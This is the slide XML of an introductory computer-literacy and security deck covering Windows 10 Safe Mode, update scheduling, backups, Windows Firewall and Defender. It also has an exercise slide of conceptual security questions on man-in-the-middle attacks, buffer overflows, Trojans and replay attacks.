              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="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a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-323850" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Merriweather"/>
              <a:buAutoNum type="arabicPeriod" startAt="13"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>Exercise: Accessing Safe Mode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Boot up your Windows 10 computer and access the login screen.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Restart your computer three times in a row to trigger the automatic repair function.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Select "Advanced options" and then "Troubleshoot".</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Select "Advanced options" again and then "Startup Settings".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Click "Restart" and choose "Safe Mode" from the list of startup options.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Log in to your computer in Safe Mode.</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Are you able to access Safe Mode successfully?</a:t>
            </a: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85"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="386" name="Google Shape;386;p33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1617825" y="287375"/>
            <a:ext cx="5908200" cy="1439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33"/>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54</a:t>
            </a:fld>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="388" name="Google Shape;388;p33"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2876100" y="340950"/>
            <a:ext cx="3695400" cy="492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 (cont.)</a:t>
            </a:r>
            <a:endParaRPr sz="3000" b="1" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
              <a:latin typeface="Roboto Slab"/>
              <a:ea typeface="Roboto Slab"/>
              <a:cs typeface="Roboto Slab"/>
              <a:sym typeface="Roboto Slab"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="389" name="Google Shape;389;p33"/>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33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="266425" y="1082675"/>
            <a:ext cx="8228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2900"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="391" name="Google Shape;391;p33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="860150" y="780275"/>
            <a:ext cx="7350900" cy="4132800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-323850" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Merriweather"/>
              <a:buAutoNum type="arabicPeriod" startAt="15"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>Exercise: Scheduling Updates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Open the Windows 10 "Settings" app and navigate to the "Update &amp; Security" section.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Click on "Advanced options" and then click on "Change active hours".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Set your active hours to a time period when you typically use your computer.</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Check the "Automatically adjust active hours for this device" option.</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Navigate back to the "Windows Update" section and click on "Pause updates for 7 days".</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Repeat this process to extend the pause period if needed.</a:t>
            </a:r>
            <a:endParaRPr sz="1500" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" lvl="1" indent="-323850" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Merriweather"/>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>Evaluate the results and discuss with you friends: Were you able to schedule updates to avoid inconvenient reboots?</a:t>
            </a:r>
            <a:endParaRPr sz="1500" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="15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26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1617825" y="422850"/>
            <a:ext cx="5908200" cy="13035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6"/>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55</a:t>
            </a:fld>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="372" name="Google Shape;372;p26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3414025" y="295400"/>
            <a:ext cx="3134400" cy="6135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3000" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="198754"/>
                </a:solidFill>
                <a:latin typeface="Roboto Slab"/>
                <a:ea typeface="Roboto Slab"/>
                <a:cs typeface="Roboto Slab"/>
                <a:sym typeface="Roboto Slab"/>
              </a:rPr>
              <a:t>Exercises</a:t>
            </a:r>
            <a:endParaRPr sz="3000" b="1" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
              <a:latin typeface="Roboto Slab"/>
              <a:ea typeface="Roboto Slab"/>
              <a:cs typeface="Roboto Slab"/>
              <a:sym typeface="Roboto Slab"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="373" name="Google Shape;373;p26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8406325" y="1246225"/>
            <a:ext cx="65256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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838725" y="908900"/>
            <a:ext cx="7254600" cy="4802400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-323850" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Merriweather"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>Identify and describe one example of a man-in-the-middle attack and suggest a countermeasure to prevent it.</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="0" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-323850" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Merriweather"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>List three physical security measures that can protect data centers and explain how each measure contributes to overall security.</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="0" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-323850" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Merriweather"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>Create a simple pseudocode example demonstrating how a buffer overflow can occur in a program.</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="0" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-323850" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Merriweather"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>List and briefly explain two differences between a Trojan Horse and a Virus.</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="0" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-323850" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Merriweather"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>Explain what a replay attack is and provide a real-world scenario where it could be used.</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="0" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweath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pic>
        <p:nvPicPr>
          <p:cNvPr id="396" name="Google Shape;396;p34"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="12396" t="7125" r="13103" b="7746"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5158250" y="1344025"/>
            <a:ext cx="2943175" cy="3486924"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="397" name="Google Shape;397;p34"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097900" y="1111225"/>
            <a:ext cx="39627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a:solidFill>
                  <a:srgbClr val="198754"/>
                </a:solidFill>
                <a:latin typeface="Roboto Slab"/>
                <a:ea typeface="Roboto Slab"/>
                <a:cs typeface="Roboto Slab"/>
                <a:sym typeface="Roboto Slab"/>
              </a:rPr>
              <a:t>Thanks!</a:t>
            </a:r>
            <a:endParaRPr sz="6000" b="1" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
              <a:latin typeface="Roboto Slab"/>
              <a:ea typeface="Roboto Slab"/>
              <a:cs typeface="Roboto Slab"/>
              <a:sym typeface="Roboto Slab"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="398" name="Google Shape;398;p3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solidFill>
                  <a:srgbClr val="198754"/>
                </a:solidFill>
              </a:rPr>
              <a:t>56</a:t>
            </a:fld>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="19875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6</a:t>
            </a:fld>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="208" name="Google Shape;208;p15"/>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5"/>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Backing up a Windows 10 PC</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="211" name="Google Shape;211;p15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="604350" y="826413"/>
            <a:ext cx="7591200" cy="1790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Windows 10 has many of the same backup features that were present on Windows 7, accessed by going into Settings &gt; Update &amp; Security &gt; Backup.</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The options include adding another drive to backup to, or accessing a previous backup on another machine – you can restore from a backup you created using Windows 7, in fact.</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="212" name="Google Shape;212;p15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="604350" y="2617125"/>
            <a:ext cx="4467000" cy="16623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OneDrive is also a quick and easy option for backing up files, providing an off-site alternative in case of fire or theft. You'll find OneDrive under File Explorer (which in turn is under the Start menu)</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="213" name="Google Shape;213;p15"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5167613" y="2770304"/>
            <a:ext cx="3449463" cy="197954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6"/>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7</a:t>
            </a:fld>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="219" name="Google Shape;219;p16"/>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16"/>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6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1926175" y="200975"/>
            <a:ext cx="5502600" cy="8364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Protecting your PC with Windows Firewall</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="222" name="Google Shape;222;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="657225" y="933538"/>
            <a:ext cx="7591200" cy="1416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Windows Firewall can be configured as incredibly strong via the 'Advanced Settings' option – i.e. it blocks all suspect apps without asking – or slightly weaker, which means there's a slightly greater risk that your PC will become hit with some kind of infection, but the firewall won't interfere as much.</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="223" name="Google Shape;223;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="657225" y="2349550"/>
            <a:ext cx="4960800" cy="22833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The easiest way to find out which settings are best for you is to simply test things out for a few days and tweak as needed.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If you forget what you've done in the settings or think you've messed things up, just click on Restore Default Policy on the right-hand side of the Advanced Settings menu to get things back to normal.</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="224" name="Google Shape;224;p16"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect r="25925" b="13554"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5703625" y="2556900"/>
            <a:ext cx="3227451" cy="157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8</a:t>
            </a:fld>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="230" name="Google Shape;230;p17"/>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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1764000" y="200975"/>
            <a:ext cx="56649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7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1926175" y="200975"/>
            <a:ext cx="5502600" cy="5793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300" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="198754"/>
                </a:solidFill>
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>Benefiting from Windows Defender</a:t>
            </a:r>
            <a:endParaRPr sz="2300" b="1" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
